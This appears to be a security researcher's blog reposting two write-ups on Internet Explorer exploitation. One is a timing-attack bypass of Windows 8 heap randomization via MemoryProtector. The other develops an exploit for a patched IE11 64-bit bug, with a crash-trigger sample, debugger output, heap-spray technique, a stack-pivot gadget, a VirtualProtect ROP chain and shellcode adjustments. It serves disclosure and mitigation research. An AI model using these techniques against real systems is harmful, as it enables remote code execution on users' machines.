Tuesday, June 16, 2015

Dude, where’s my heap?

Or: Bypassing High-Entropy Bottom-Up Randomization in Windows 8 by abusing IE’s Memory Protection

Note: This is a copy of a blog post that was originally published on the Google Project Zero blog.

The ability to place controlled content to a predictable location in memory can be an important primitive in exploitation of memory corruption vulnerabilities. A technique that is commonly used to this end in browser exploitation is heap spraying: By allocating a large amount of memory an attacker ensures that some of the allocations happen in a predictable memory region. In order to break this technique, in Windows 8 Microsoft introduced High Entropy Bottom-Up Randomization. Essentially, it introduces 1TB of variance in start address of heap (as well as stack and other allocations) in 64-bit processes. In a traditional heap spraying scenario, this would mean that the attacker needs to allocate over 1TB of memory in order to place content at a predictable location which is infeasible on today’s computers. Internet Explorer 11 (as well as various other 64-bit processes on Windows 8) employs this mitigation whenever it uses a 64-bit tab process (such as in Metro mode or with Enhanced Protected Mode turned on).

Internet Explorer also introduced another mitigation called MemoryProtector in order to prevent exploitability of use-after-free vulnerabilities. The two mitigations are not meant to be related. However, somewhat unexpectedly, one can be (ab)used to bypass the other. In one sentence, it is possible to use a timing attack on MemoryProtector to reveal the offset used by High-Entropy Bottom-Up Randomization, thus completely bypassing it.

The Issue

MemoryProtector is intended to prevent exploitation of a certain kind of use-after-free vulnerabilities. Since details of the mitigation have already been published in various places (such as here), only the bare essentials sufficient to understand the issue will be given here. Simplified, MemoryProtector prevents exploitability of use-after-free vulnerabilities in which a pointer to a freed object is kept on the stack. This is a common situation in web browsers caused by the code such as

Node* node = getNodeFromSomewhere();
fireJavaScriptCallback(); // kills node

In the example above, a pointer to the Node object is obtained and stored in a local variable (on stack). After that, a function is called which ends up causing JavaScript callback. Attacker-controlled code in the JavaScript callback causes node to be deleted, but after the control flow returns to the code above, the node is referenced after being deleted (use-after-free condition).

MemoryProtector works by preventing the object (Node in the example above) from being freed if its address can be found on the stack (in the node variable in the example above). If MemoryProtector is enabled, for certain classes, deleting won’t free the memory right away - it will only zero it out. Once the size of those freed-but-not-really objects reaches a certain threshold, MemoryProtector will scan the stack and identify which of these objects have their addresses on the stack. Those that do not will be deleted. The others are left untouched and will be considered again during the next stack scan. Thus it is ensured that no object gets freed while its address is on the stack.

To demonstrate the issue that enables us to defeat High-Entropy Bottom-Up Randomization several observations need to be made. The first observation is that, when scanning the stack, MemoryProtector cannot differentiate between addresses and other types of data on the stack. Thus, it will treat all data on the stack (such as, for example, user-controlled double-precision numbers or 64-bit integers) as addresses. Since some of this data can be attacker-controlled, an attacker can deliberately place something that looks like an address on the stack and prevent an object located at that address from being freed. In fact, an attacker might be able to place multiple addresses on the stack and prevent freeing of objects at any of those addresses. By itself this isn’t very dangerous - it can cause memory exhaustion and not much else.

The second observation to make is that freeing memory takes time, especially for large (such as 1MB used by the PoC) objects where free/delete ends up calling VirtualFree. The time is sufficiently large to observe a difference between the time it takes to free a large object and attempting to delete an object without actually freeing it (which happens with MemoryProtector) if the address of the object is present on the stack during the delete attempt.

This is demonstrated in Figure 1. Notice that for memory range [0x9ddc000000, 0x9de0000000] the time it takes for MemoryProtector to run is much less than for other ranges because the block doesn’t get freed during the run. Also notice that the next run takes longer than average. This is because during this run two blocks are freed (one from the current run and one from the previous one).

Figure 1.

Thus by spraying the stack with a range of possible addresses and then triggering a free and measuring the time it takes to free (or not) the object, it is possible to determine if the object was allocated in the given address range or not. If an address of the object is detected, the attacker will also learn the approximate offset used by High Entropy Bottom-Up Randomization and will be able to predict addresses used by future (or past) allocations.

Description of the Exploit

There are several hoops to jump through in order to exploit the issue. The first one is placing controllable data on the stack. Standard stack spraying techniques such as using a JavaScript function with a lot of local variables or calling a JavaScript function with a lot of arguments don’t actually work because JavaScript variables in IE are stored in a packed format which makes it difficult to have a variable whose representation could also be mistaken for an address (that is, different than the address of a variable itself). However, I have observed that during some numeric computations, such as multiplication, JavaScript engine will place intermediate results in a native double format on the stack. It is trivial to create double-precision numbers that will look like addresses in the required range (0x0000000000 to 0x10000000000).

The second issue is reducing the search space because we don’t want to have to try out all addresses in the lower 1TB range. Since we will be using a large allocation (allocated using VirtualAlloc) it is known that the allocation will be made on 0x1000 boundary (in Windows 8). Thus there are ‘only’ 0x10000000 possibilities. Note also that for each experiment we can place multiple values on the stack at once. The current PoC can test 0x4000 possibilities in one experiment, thus also reducing the number of required experiments to 0x4000 (16K). If each experiment allocates 1M of memory, this means that all experiments allocate a total of 16GB of memory throughout a single PoC run. However note that these allocations are not needed at the same time, in fact only two 1M allocations are needed at any given time plus some stack space and other smaller heap allocation made by the PoC. Thus the PoC should run fine even on machines with very low amount of free RAM.

The next issue is triggering MemoryProtector at the desired time. By looking at the code of MemoryProtection::CMemoryProtector::ReclaimMemory() function, it is easily determined that MemoryProtector triggers after more than 100000 bytes of memory is freed. This is fine because we’ll use an allocation larger than that anyway. In the PoC, MemoryProtector is triggered by first setting the ‘title’ property of a Button HTML element to a large (1MB) string and then to a small string. If the address of a large string is not found on a stack when MemoryProtector is triggered, it will get freed. Otherwise, it will get freed next time MemoryProtector runs if the allocation address is no longer on the stack.

We also need a way to measure time precisely since the times involved will be in sub-millisecond intervals. Fortunately, we can use performance.now() API which is supported in Internet Explorer for this.

The full PoC can be found here.

Reproducing the Issue

To reproduce the issue you first need to ensure that IE runs tab process in 64-bit mode. There are several ways to accomplish this. Probably the easiest is to open the PoC in IE in Metro mode where 64-bit tab process is used by default. In desktop mode 64-bit is still not the default (though presumably this will change at some point in the future). But you can have 64-bit tab processes in desktop mode as well either by making IE run in a single process mode or enabling Enhanced Protected Mode.

You can make IE run in a single process mode by setting TabProcGrowth registry key to 0, however note that this should never be used when browsing untrusted websites and opening untrusted files as it disables the IE sandbox.

The recommended way to run IE in 64-bit mode is to enable Enhanced Protected Mode,  which can be done by changing Internet Options -> Advanced -> Security -> ‘Enable Enhanced Protected Mode’ and ‘Enable 64-bit processes for Enhanced Protected Mode’. Not only will this enable additional mitigations that can be found on 64-bit Windows but will also enable additional sandboxing features, so I fully recommend that users run IE like this.

Note however, that when Enhanced Protected Mode is enabled, you’ll need to open the PoC in the Internet Zone because Enhanced Protected Mode does not get applied to Local intranet and Trusted sites (including local files). If successful, you should see processes like this when opening the PoC.

Figure 2.

Note: It’s also possible to run the PoC in 32-bit mode with some changes. You need to replace the line ‘o.cur = min + 0x40;’ with ‘o.cur = min + 0x20;’ and the line ‘var max = 0x10000000000;’ with ‘var max = 0x100000000;’. However note that High Entropy Bottom-Up Randomization doesn’t get applied to 32-bit processes so all allocations should (predictably) happen in a low memory range.

After you have the test environment set up, just click “Dude, where’s my heap?” button on the PoC and wait. The entire run of the PoC takes about 30 seconds on a reasonably modern computer.

After the test run finishes, you should see the detected allocation memory range as well as detailed output of memory ranges sorted by time it took to run the experiment. By opening IE process in your favorite debugger you should be able to verify that memory allocations do indeed happen in the detected range. This is demonstrated in Figure 3.

Figure 3.

The PoC currently uses a very simple heuristics to detect if the run was successful - there needs to be a single memory range for which the run time is faster than for all other runs by at least a threshold %. Note that this PoC is made just for demonstration purposes and there are likely ways to make the poc both faster and more reliable. It could be made more reliable for example by repeating the experiments for the small number of best candidates (and possibly adjacent ranges) to verify the result or repeating the entire run if the result can’t be verified. It could also be made faster by breaking early if a good candidate is found in one of the experiments (expected to reduce the run time by half on average), by finding a way to put more user-controlled data on the stack or possibly by incorporating some other insight about the entropy of bottom-up randomization.

Vendor response

The issue was reported to Microsoft on January 19th in the context of the Mitigation Bypass Bounty program. The initial response (on January 28th) was that the “submission meets Microsoft’s criteria for the Mitigation Bypass” and “has novel elements”. On April 23rd (~3 months later) I was notified that “investigation determined the effort involved to ship a fix, that enabled MemoryProtect to not allow ASLR bypass down level, would be a significant amount of resources (and possible regression risk) for an issue primarily applicable to a non-default configuration” and Microsoft “will explore ways to mitigate this problem in the next version of our product”. MSRC noted this decision was based on the facts that “64-bit IE is a non-default configuration” and “MemoryProtect has led to a significant overall decrease of IE case submissions”. Thus the issue is still unfixed.

Potential collision with HP Security Research

On February 5th (2 weeks after I sent my report to Microsoft) HP Security Research announced that they also received a Mitigation Bypass bounty from Microsoft. In addition to other attacks they mention that “attacker can use MemoryProtection as an oracle to completely bypass ASLR” which leads me to believe that there is a partial (but not complete, judging by the Microsoft response) overlap between our research.

The details of HP’s research are unknown at this time but if I had to guess, I’d say they were using the same basic principle to map the free memory of a 32-bit process. By finding which memory regions are already allocated (addresses where the attacker can’t allocate memory on) it might be possible, based on the allocation address and size, to tell which of these allocations were made by executable modules.


Both High-Entropy Bottom-Up Randomization and MemoryProtector are really useful mitigations. Without MemoryProtector or in scenarios where the attacker does not have the same amount of control as in a web browser, High-Entropy Bottom-Up Randomization is an efficient defense against heap spraying and similar techniques. Similarly MemoryProtector is an efficient defense for use-after-free vulnerabilities where the object reference is kept on the stack. While it might be possible to bypass it in specific scenarios, it renders a large number of vulnerabilities unexploitable.

It is only when these mitigations come together in an environment with a lot of control given to the attacker, including control over the stack and heap allocation as well as the ability to accurately measure time, that the problem manifests. For what it is worth I agree that fixing the issue would be very difficult without making serious compromises because it basically exploits how the mitigations in question work as intended. Microsoft has a tough job if they indeed want to fix this issue in the future.

As new mitigations grow both in number and complexity this might not be the last time we see them interacting in unexpected ways.

Wednesday, November 6, 2013

Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview

Note: The vulnerability described here has been patched by Microsoft in October 2013 security update.

Earlier this year, Microsoft announced several security bounty programs one of which was a bounty program for bugs in Internet Explorer 11. I participated in this program and relatively quickly found a memory corruption bug. Although I believed the bug could be exploited for remote code execution, due to lack of time (I just became a father right before the bounty programs started so I had other preoccupations) I haven’t actually developed a working exploit at the time. However, I was interested in the difficulty of writing an exploit for the new OS and browser version so I decided to try to develop an exploit later. In this post, I’ll first describe the bug and then the development of a working exploit for it on 64-bit Windows 8.1 Preview.

When setting out to develop the exploit I didn't strive to make a 100% reliable exploit (The specifics of the bug would have made it difficult and my goal was to experiment with the new platform and not make the next cyber weapon), however I did set some limitations for myself that would make the exercise more challenging:
1. The exploit should not rely on any plugins (so no Flash and no Java). I wanted it to work on the default installation.
2. The exploit must work on 64-bit IE and 64-bit Windows. Because 32-bit would be cheating as many exploit mitigation techniques (such as heap base randomization) aren't really effective on 32-bit OS or processes. Additionally, there aren't many 64-bit Windows exploits out there.
3. No additional vulnerabilities should be used (e.g. for ASLR bypass)

One prior note about exploiting 64-bit Internet Explorer: In Windows 8 and 8.1, when running IE on the desktop (“old interface”) the renderer processes of IE will be 32-bit even if the main process is 64-bit. If the new (“touch screen”) interface is used everything is 64-bit. This is an interesting choice and makes the desktop version of IE less secure. So in the default environment, the exploit shown here actually targets the touch screen interface version of IE.

To force IE into using 64-bit mode on the desktop for exploit development, I forced IE to use single process mode (TabProcGrowth registry key). However note that this was used for debugging only and, if used for browsing random pages, it will make IE even less secure because it disables the IE’s sandbox mode.

The bug

A minimal sample that triggers the bug is shown below.

function bug() {
 t = document.getElementsByTagName("table")[0];
 t.parentNode.runtimeStyle.posWidth = "";
<body onload=bug()>
<table><th><ins>aaaaaaaaaa aaaaaaaaaa

And here is the the debugger output.

(4a8.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> r
rax=000000a6d1466170 rbx=000000a6d681c360 rcx=000000000000007f
rdx=0000000001ffffff rsi=000000a6d5960330 rdi=00000000ffffffff
rip=00007ff8e0c90306 rsp=000000a6d61794b0 rbp=000000a6d5943a90
r8=0000000000000001  r9=0000000000000008 r10=00000000c0000034
r11=000000a6d61794a0 r12=00000000ffffffff r13=00000000ffffffff
r14=000000000000000b r15=00000000ffffffff
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> k
Child-SP          RetAddr           Call Site
000000a6`d61794b0 00007ff8`e0e49cc0 MSHTML!Layout::ContainerBox::ContainerBox+0x1e6
000000a6`d6179530 00007ff8`e0e554a8 MSHTML!Layout::TableGridBox::TableGridBox+0x38
000000a6`d6179590 00007ff8`e0e553c2 MSHTML!Layout::TableGridBoxBuilder::CreateTableGridBoxBuilder+0xd8
000000a6`d6179600 00007ff8`e0c8b720 MSHTML!Layout::LayoutBuilder::CreateLayoutBoxBuilder+0x2c9
000000a6`d61796c0 00007ff8`e0c8a583 MSHTML!Layout::LayoutBuilderDriver::StartLayout+0x85f
000000a6`d61798d0 00007ff8`e0c85bb2 MSHTML!Layout::PageCollection::FormatPage+0x287
000000a6`d6179a60 00007ff8`e0c856ae MSHTML!Layout::PageCollection::LayoutPagesCore+0x2aa
000000a6`d6179c00 00007ff8`e0c86389 MSHTML!Layout::PageCollection::LayoutPages+0x18e
000000a6`d6179c90 00007ff8`e0c8610f MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x251
000000a6`d6179db0 00007ff8`e0df85ca MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd7
000000a6`d6179e70 00007ff8`e12d472d MSHTML!CMarkupPageLayout::DoLayout+0x76
000000a6`d6179eb0 00007ff8`e0d9de95 MSHTML!CView::EnsureView+0xcde
000000a6`d617a270 00007ff8`e0d1c29e MSHTML!CElement::EnsureRecalcNotify+0x135
000000a6`d617a310 00007ff8`e1556150 MSHTML!CElement::EnsureRecalcNotify+0x1e
000000a6`d617a350 00007ff8`e1555f6b MSHTML!CElement::focusHelperInternal+0x154
000000a6`d617a3b0 00007ff8`e19195ee MSHTML!CElement::focus+0x87
000000a6`d617a400 00007ff8`e06ed862 MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x52
000000a6`d617a460 00007ff8`e06f0039 jscript9!amd64_CallFunction+0x82
000000a6`d617a4b0 00007ff8`e06ed862 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x154
000000a6`d617a550 00007ff8`e06f26ff jscript9!amd64_CallFunction+0x82

As can be seen above, IE crashes in MSHTML!Layout:ContainerBox:ContainerBox function while attempting to read uninitialized memory pointed to by rax + rdx*8. rax actually points to valid memory that contains a CFormatCache object (which looks correct given the PoC), while the value of rdx (0x0000000001ffffff) is interesting. So I looked at the code of ContainerBox:ContainerBox function to see where this value comes from and also what can be done if an attacker would control the memory at rax + 0xffffff8.

00007ffb`dac00145 83cdff          or      ebp,0FFFFFFFFh
00007ffb`dac0023e 440fb64713      movzx   r8d,byte ptr [rdi+13h]
00007ffb`dac00243 410fb6c0        movzx   eax,r8b
00007ffb`dac00247 c0e805          shr     al,5
00007ffb`dac0024a 2401            and     al,1
00007ffb`dac0024c 0f84048f6200    je      MSHTML!Layout::ContainerBox::ContainerBox+0x562 (00007ffb`db229156)
00007ffb`dac00252 440fb76f68      movzx   r13d,word ptr [rdi+68h]
00007ffb`db229156 448bed          mov     r13d,ebp
00007ffb`db229159 e9f9709dff      jmp     MSHTML!Layout::ContainerBox::ContainerBox+0x137 (00007ffb`dac00257)
00007ffb`dac002db 410fbffd        movsx   edi,r13w
00007ffb`dac002fb 8bcf            mov     ecx,edi
00007ffb`dac002fd 8bd7            mov     edx,edi
00007ffb`dac002ff 48c1ea07        shr     rdx,7
00007ffb`dac00303 83e17f          and     ecx,7Fh
00007ffb`dac00306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:0000007a`390257f8=????????????????
00007ffb`dac0030a 488d0c49        lea     rcx,[rcx+rcx*2]
00007ffb`dac0030e 488d14c8        lea     rdx,[rax+rcx*8]
00007ffb`dac00312 8b4cc810        mov     ecx,dword ptr [rax+rcx*8+10h]
00007ffb`dac00316 8b420c          mov     eax,dword ptr [rdx+0Ch]
00007ffb`dac00319 3bc8            cmp     ecx,eax
00007ffb`dac0031b 0f83150d7500    jae     MSHTML!Layout::ContainerBox::ContainerBox+0x750f16 (00007ffb`db351036)
00007ffb`dac00321 ffc0            inc     eax
00007ffb`dac00323 89420c          mov     dword ptr [rdx+0Ch],eax

The value of rdx at the time of crash comes after several assignments from the value of ebp which is initialized to 0xFFFFFFFF near the beginning of the function (note that ebp/rbp is not used as the frame pointer here). My assumption is that the value 0xFFFFFFFF (-1) is an initial value of variable used as an index into CFormatCache. Later in the code, a pointer to a CTreeNode is obtained, a flag in the CTreeNode is examined and if it is set, the index value is copied from the CTreeNode object. However, if the flag is not set (as is the case in the PoC), the initial value is used. The value 0xFFFFFFFF is then split into two parts, upper and lower (it looks like CFormatCache is implemented as a 2D array). A value of the higher index (will be equal to 0x1ffffff) will be multiplied by 8 (size of void*), this offset is added to rax and the content at this memory location is written back to rax. Then, a value of the lower index (will be 0x7f) is multiplied with 24 (presumably the size of CCharFormat element), this offset is added to eax and the content of this memory location is written to rdx. Finally, and this is the part relevant for exploitation, a number at [rdx+0C] is taken, increased, and then written back to [rdx+0C].

Written in C++ and simplified a bit, the relevant code would look like this:

int cacheIndex = -1;
if(treeNode->flag) {
  cacheIndex = treeNode->cacheIndex;
unsigned int index_hi = cacheIndex, index_lo = cacheIndex;
index_hi = index_hi >> 7;
index_lo = index_lo & 0x7f;
//with sizeof(formatCache[i]) == 8 and sizeof(formatCache[i][j]) == 24

For practical exploitation purposes, what happens is this: A pointer to valid memory (CFormatCache pointer) is increased by 0x0FFFFFF8 (256M) and the value at this address is treated as another pointer. Let’s call the address (CFormatCache address + 0x0FFFFFF8) P1 and the address it points to P2. The DWORD value at (P2 + BF4) will be increased by 1 (Note: BF4 is computed as 0x7F * 3 * 8 + 0x0C).

The exploit

If we were writing an exploit for a 32-bit process, a straightforward (though not very clean) way to exploit the bug using heap spraying would be to spray with a 32-bit number such that when BF4 is added to it, an address of something interesting (e.g. string or array length) is obtained. An “address of something interesting” could be predicted by having another heap spray consisting of “interesting objects”.

Since the exploit is being written for 64-bit process with full ASLR, we won’t know or be able to guess an address of an “interesting” object. We certainly won’t be able to fill an address space of a 64-bit process and heap base will be randomized, thus making addresses of objects on the heap unpredictable.

Heap spraying lives

However, even in this case, heap spraying is still useful for the first part of the exploit. Note that when triggering the bug, P1 is calculated as a valid heap address increased by 0x0FFFFFF8 (256M). And if we heap spray, we are allocating memory relative to the heap base. Thus, by spraying approximately 256M of memory we can set P2 to arbitrary value.

So to conclude, despite significantly larger address space in 64-bit processes and heap base randomization, heap spraying is still useful in cases where we can make a vulnerable application dereference memory at a valid heap address + a large offset. As this is a typical behavior for bounds checking vulnerabilities, it’s not altogether uncommon. Besides the bug being discussed here, the previous IE bug I wrote about exploiting here also exhibits this behavior.

Although heap spraying is often avoided in modern exploits in favor of the more reliable alternatives, given a large (fixed) offset of 256M, it is pretty much required in this case. And although the offset is fixed, it’s a pretty good value as far as heap spraying goes. Not too large to cause memory exhaustion and not too small to cause major reliability issues (other than those from using heap spraying in the first place).

Look Ma, no Flash

But the problem of not being able to guess an address of an interesting object still remains, and thus the question is, what do we heap spray with? Well, instead of heap spraying with the exact values, we can spray with pointers instead. Since an offset of 0xBF4 is added to P2 before increasing the value it points to, we’ll spray with an address of some object and try to make this address + 0xBF4 point to something of interest.

So what should “something of interest” be? The first thing I tried is a length of a JavaScript string as in here. And although I was able to align the stars to overwrite higher dword of a qword containing a string length, a problem arose: JavaScript string length is treated as a 32-bit number. Note that most pointers (including those we can easily use in our heap spray) on 64-bit will be qword aligned and when adding an offset of 0xBF4 to such a pointer we will end up with a pointer to higher dword in a qword-aligned memory. So an interesting value needs to either be 64-bit or not qword aligned.

Another idea was to try to overwrite an address. However, note that triggering the bug would increase the address by 4GB as (assuming a qword-aligned address) we are increasing the higher dword. To control the content at this address we would need another heap spray of ~4G data and this would cause memory issues on computers with less free RAM than that. Incidentally, the computer I ran Windows 8.1 Preview VM on had only 4GB of RAM and the Windows 8.1 VM had just 2GB of RAM so I decided to drop this idea and look at alternatives.

In several recent exploits used in the wild, a length of a Flash array was overwritten to leverage a vulnerability. While Flash was off limits in this exercise, let’s take a look at JavaScript arrays in IE 11 instead. As it turns out, there is an interesting value that is correctly aligned. An example JavaScript Array object with explanation of some of the fields is shown below. Note that the actual array content may be split across several buffers.

offset:0, size:8 vtable ptr
offset:0x20, size:4 array length
offset:0x28, size:8 pointer to the buffer containing array data
[beginning of the first buffer, stored together with the array]
offset:0x50, size:4 index of the first element in this buffer
offset:0x54, size:4 number of elements currently in the buffer
offset:0x58, size:4 buffer capacity
offset:0x60, size:8 ptr to the next buffer
offset:0x68, size:varies array data stored in the buffer

Although it’s not necessary for understanding the exploit, here’s also an example String object with explanation of some of the fields.

offset:0, size:8 vtable ptr
offset:0x10, size:4 string length
offset:0x18, size:8 data ptr

As can be seen from above, the “number of elements currently in the buffer” of a JavaScript array is not qword-aligned and is a value that might be interesting to overwrite.

This is indeed the value I ended up going for. To accomplish this, I got the memory aligned as seen in the image below.

We’ll heap spray with pointers to a JavaScript String object by creating large JavaScript arrays where each element of the array will be the same string object. We’ll also get memory aligned in such a way that, at an offset 0xBF4 from the start of the string, there will be a a part of a JavaScript array that holds the value we want to overwrite.

You might wonder why I heap sprayed with pointers to String and not an Array object. The reason for this is that the String object is much smaller (32 bytes vs. 128 bytes) so by having multiple strings close to one another and pointing to a specific one, we can better “aim” for a specific offset inside an Array object. Of course, if we have several strings close to one another, the question becomes which one to use in a heap spray. Since an Array object is 4 time the size of a String, there are four different offsets in the Array we can overwrite. By choosing randomly, in one case (with probability 1/4), we will overwrite exactly what we want. In one case, we will overwrite an address that will cause a crash on a subsequent access of the array. And in the remaining two cases, we will overwrite values that are not important and we would be able to try again by spraying with a pointer to a different string. Thus a blind guess will give success probability of 1/4 while a try/retry approach would give a probability of success of 3/4 (if you know your statistics, you might think that this number is wrong, but we can actually avoid crashes after an incorrect but non-fatal attempt by trying different strings in a descending order). An even better approach would be to disclose the string offsets by first aligning memory in a way to put something readable at an offset 0xBF4 from the String object used in the heap spray. While I have observed that this is possible, this isn’t implemented in the provided exploit code and is left as an exercise for the reader. Refer to the next section for information that could help you to achieve such alignment.

In the exploit code provided, a naive (semi)blind-guess approach is used where there is a large array of Strings (strarr) and a string at a constant index is used for the heap spray. I have observed that this works reliably for me when opening the PoC in a new process/tab (so I didn’t have any other JavaScript objects in the current process). If you want to play with the exploit and the index I used doesn’t work for you, you’ll likely need to pick a different one or implement one of the approaches described above.

Feng Shui in JavaScript heap

Before moving on with the exploit, let’s first take some time to examine how it’s possible to heap spray in IE11 and get a correct object alignment on heap with a high reliability.

Firstly, heap spraying: While Microsoft has made it rather difficult to heap spray with JavaScript strings, JavaScript arrays in IE11 appear not to prevent this in any way. It’s possible to spray both with pointers (as seen above) as well as with absolute values by e.g. creating a large array of integers. While many recent IE exploits use Flash for heap spraying, it’s not necessary and, given the current Array implementation and improved speed over the predecessors, JavaScript arrays might just be the object of choice to implement heap spraying in IE in the future.

Secondly, alignment of objects on heap: While the default Heap implementation in Windows 8 and above (the low fragmentation heap) includes several mitigations that make getting the desired alignment difficult, such as guard pages and allocation order randomization, in IE11 basic JavaScript objects (such as Arrays and Strings) use a custom heap implementation that has none of these features.

I’ll shortly describe what I observed about this JavaScript heap implementation. Note that all of the below is based on observation of the behavior and not reverse-engineering the code, so I might have made some wrong conclusions, but it works as described for the purposes of the given exploit.

The space for the JavaScript objects is allocated in blocks of 0x20000 bytes. If more space is needed, additional blocks will be allocated and there is nothing preventing these blocks to be right next to one another (so a theoretical overflow in one block could write into another).

These blocks are further divided into bins of 0x1000 bytes (at least for small objects). One bin will only hold objects of the same size and possibly type. So for example, in this exploit where we have String and Array objects of size 32 and 128 bytes respectively, some bins will hold only String objects (128 of them at most), while some of them will hold only Array objects (32 of them at most). When a bin is fully used, it contains only the “useful” content and no metadata. I have also observed that the objects are stored in separate 0x20000-size blocks than the user-provided content, so string and array data will be stored in different blocks than the corresponding String and Array objects, except when the data is small enough to be stored together with the object (e.g. single-character strings, small arrays like the 5-element ones in the exploit).

The allocation order of objects inside a given bin is sequential. That means that, e.g. if we create three String objects in close succession and assuming no holes in any of the bins, they will be next to each other with the first one having the lowest address, followed by the second followed by the third.

And now, for my next trick

So at this point we can increment the number of elements in the JavaScript array. In fact, we’ll trigger the vulnerability multiple times (5 times in the provided exploit, where each trigger will increase this number by 3) in order to increase it a bit more. Unfortunately, increasing the number of elements does not allow us to write data past the end of the buffer, but it does allow us to read data past the end. This is sufficient at this point because it allows us to break ASLR and learn the precise address of the Array object we overwrote.

Knowing the address of the Array object, we can repeat the heap spray, but this time, we’ll spray with exact values (I used Array of integers to spray with the exact values). A value we are going to spray with is going to be an address of buffer capacity of an array decreased by 0xBF1. This means that that the spray value + 0xBF4 will be the address of the highest byte of the buffer capacity value. After the buffer capacity has been overwritten, we’ll be able to both read and write data past the end of the JS Array’s buffer.

From here, we can quite easily get the two important elements that constitute a modern browser exploit: The ability to read arbitrary memory and to gain control over RIP.

We can read arbitrary memory by scanning the memory after the Array for a String object and then overwriting the data pointer and (if we want to read larger data) size of the string.

We can get control over RIP by overwriting a vtable pointer of a nearby Array object and triggering a virtual method call. While IE10 introduced Virtual Table Guard (vtguard) for some classes in mshtml.dll, jscript9.dll has no such protections. However note that, having arbitrary memory disclosure, even if vtguard was present it would be just a minor annoyance.

64-bit exploits for 32-bit exploit writers

With control over RIP and memory disclosure, we’ll want to construct a ROP chain in order to defeat DEP. As we don’t control the stack, the first thing we need is a stack pivot gadget. So, with arbitrary memory disclosure it should be easy to search for xchg rax,rsp; ret; in some executable module, right? Well, no. As it turns out, in x64, stack pivot gadgets are much less common than in x86 code. On x86, xchg eax,esp; ret; will be just 2 bytes in size, so there will be many unintended sequences like that. On x64 xchg rax,rsp; is 3 bytes which makes it much less common. Having not found it (or any other “clean” stack pivot gadgets) in mshtml.dll and jscript9.dll, I had to look for alternatives. After a look at mshtml.dll I found a stack pivot sequence shown below which isn’t very clean but does the trick assuming both rax and rcx point to a readable memory (which is the case here).

00007ffb`265ea973 50              push    rax
00007ffb`265ea974 5c              pop     rsp
00007ffb`265ea975 85d2            test    edx,edx
00007ffb`265ea977 7408            je      MSHTML!CTableLayout::GetLastRow+0x25 (00007ffb`265ea981)
00007ffb`265ea979 8b4058          mov     eax,dword ptr [rax+58h]
00007ffb`265ea97c ffc8            dec     eax
00007ffb`265ea97e 03c2            add     eax,edx
00007ffb`265ea980 c3              ret
00007ffb`265ea981 8b8184010000    mov     eax,dword ptr [rcx+184h]
00007ffb`265ea987 ffc8            dec     eax
00007ffb`265ea989 c3              ret

Note that, while there is a conditional jump in the sequence, both branches end with RET and won’t cause a crash so they both work well for our purpose. While the exploit mostly relies on jscript9 objects, an address of (larger) mshtml.dll module can be easily obtained using memory disclosure by pushing a mshtml object into a JS array object we can read and then following references from the array to mshtml object and its vtable.

After the control of the stack is gained, we can call VirtualProtect to make a part of heap we can write to executable. We can find the address of VirtualProtect in the IAT of mshtml.dll (the exploit includes some very basic PE32+ parsing). So, with the address of VirtualProtect and control over the stack, we can now just put the correct arguments of on the stack and return into VirtualProtect, right? Well, no. In 64-bit Windows, a different calling convention is used than in 32-bit. 64-bit Windows uses a fastcall convention where the first 4 arguments (which is exactly the number of arguments VirtualProtect has) are passed through registers RCX, RDX, R8 and R9 (in that order). So we need some additional gadgets to load the correct argument into the correct registers:

pop rcx; ret;
pop rdx; ret;
pop r8; ret;
pop r9; ret;

As it turns out the first three are really common in mshtml.dll. The forth one isn’t, however for VirtualProtect the last argument just needs to point to a writeable memory which is already the case at the time we get control over RIP, so we don’t actually have to change r9.

The final ROP chain looks like this:

address of pop rcx; ret;
address on the heap block with shellcode
address of pop rdx; ret;
0x1000 (size of the memory that we want to make executable)
address of pop r8; ret;
address of VirtualProtect
address of shellcode

So, we can now finally execute some x64 shellcode like SkyLined’s x64 calc shellcode that works on 64-bit Windows 7 and 8, right? Well, no. Shellcode authors usually (understandably) prefer small shellcode size over generality and save space by relying on specifics of the OS that don’t need to be true in the future versions. For example, for compatibility reasons, Windows 7 and 8 store PEB, module information structures as well as ntdll and kernel32 modules at addresses lower than 2G. This is no longer true in Windows 8.1 Preview. Also, while Windows x64 fastcall calling convention requires leaving 32 bytes of shadow space on the stack for the use of calling function, SkyLined’s win64-exec-calc-shellcode leaves just 8 bytes before calling WinExec. While this appears to work on Windows 7 and 8, on Windows 8.1 preview it will cause the command string (“calc” in this case) stored on the stack to be overwritten as it will be stored in WinExec’s shadow space. To resolve these compatibility issues I made modifications to the shellcode which I provided in the exploit. It should now work on Windows 8.1.

That’s it, finally we can execute the shellcode and have thus proven arbitrary code execution. As IE is fully 64-bit only in the touch screen mode, I don’t have a cool screenshot of Windows Calculator popped over it (calc is shown on the desktop instead). But I do have a screenshot of the desktop with IE forced into a single 64-bit process.

The full exploit code can be found at the end of this blog post.


Although Windows 8/8.1 packs an impressive arsenal of memory corruption mitigations, memory corruption exploitation is still alive and kicking. Granted, some vulnerability classes might be more difficult to exploit, but the vulnerability presented here was the first one I found in IE11 and there are likely many more vulnerabilities that can be exploited in a similar way. The exploit also demonstrates that, under some conditions, heap spraying is still useful even in 64-bit processes. In general, while there have been a few cases where it was more difficult to write parts of the exploit on x64 than it would be on x86 (such as finding what to spray with and overwrite, finding stack pivot sequences etc.), the difficulties wouldn't be sufficient to stop a determined attacker.

Finally, based on what I've seen, here are a few ideas to make writing exploits for IE11 on Windows 8.1 more difficult:
  • Consider implementing protection against heap spraying with JavaScript arrays. This could be implemented by RLE-encoding large arrays that consist of a single repeated value or several repeated values.
  • Consider implementing the same level of protection for the JavaScript heap as for the default heap implementation - add guard pages and introduce randomness.
  • Consider implementing Virtual Table Guard for common JavaScript objects.
  • Consider making compiler changes to remove all stack pivot sequences from the generated code of common modules. These are already scarce in x64 code so there shouldn't be a large performance impact.

Appendix: Exploit Code

